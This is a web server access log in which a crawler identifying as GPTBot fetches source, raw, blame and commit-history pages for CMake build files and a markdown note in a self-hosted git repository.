200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 11404] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build" +[17/Feb/2026:15:15:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13479] [Gzip 6.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:15:15:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 2154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:15:15:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 9942] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:15:15:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 14077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:15:15:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 10769] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:15:15:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 9922] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:15:15:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 11671] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject" +[17/Feb/2026:15:15:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build" [Client 74.7.227.38] [Length 11110] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject" +[17/Feb/2026:15:15:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build" [Client 74.7.227.38] [Length 11114] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject" +[17/Feb/2026:15:15:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:15:15:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 335] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:15:15:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build" [Client 74.7.227.38] [Length 9917] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build" +[17/Feb/2026:15:15:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 9928] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:15:15:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 10769] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:15:15:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 9927] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:15:15:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:15:15:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 10769] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:15:15:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 10769] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:15:15:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13347] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build" +[17/Feb/2026:15:15:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13349] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build" +[17/Feb/2026:15:15:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 19491] [Gzip 6.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build" +[17/Feb/2026:15:15:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 19492] [Gzip 6.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build" +[17/Feb/2026:15:15:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 11406] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build" +[17/Feb/2026:15:15:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:15:15:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 9923] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:15:15:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build" [Client 74.7.227.38] [Length 9920] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build" +[17/Feb/2026:15:15:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 10769] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:15:15:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 10192] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build" +[17/Feb/2026:15:15:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 9921] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:15:15:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13479] [Gzip 6.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:15:15:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 2154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:15:15:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 2154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:15:15:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13477] [Gzip 6.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:15:15:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 9938] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:15:15:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 14077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:15:15:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 14077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:15:15:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 335] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:15:15:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 9924] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:15:15:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:15:15:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 9922] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:15:15:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 9920] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:15:15:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 9928] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:15:15:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 9929] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:15:15:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build" [Client 74.7.227.38] [Length 9919] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build" +[17/Feb/2026:15:15:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build" [Client 74.7.227.38] [Length 9918] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build" +[17/Feb/2026:15:15:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build" [Client 74.7.227.38] [Length 9919] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build" +[17/Feb/2026:15:15:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 10768] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:15:15:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build" [Client 74.7.227.38] [Length 9919] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build" +[17/Feb/2026:15:15:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 72684] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project" +[17/Feb/2026:15:15:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 72686] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 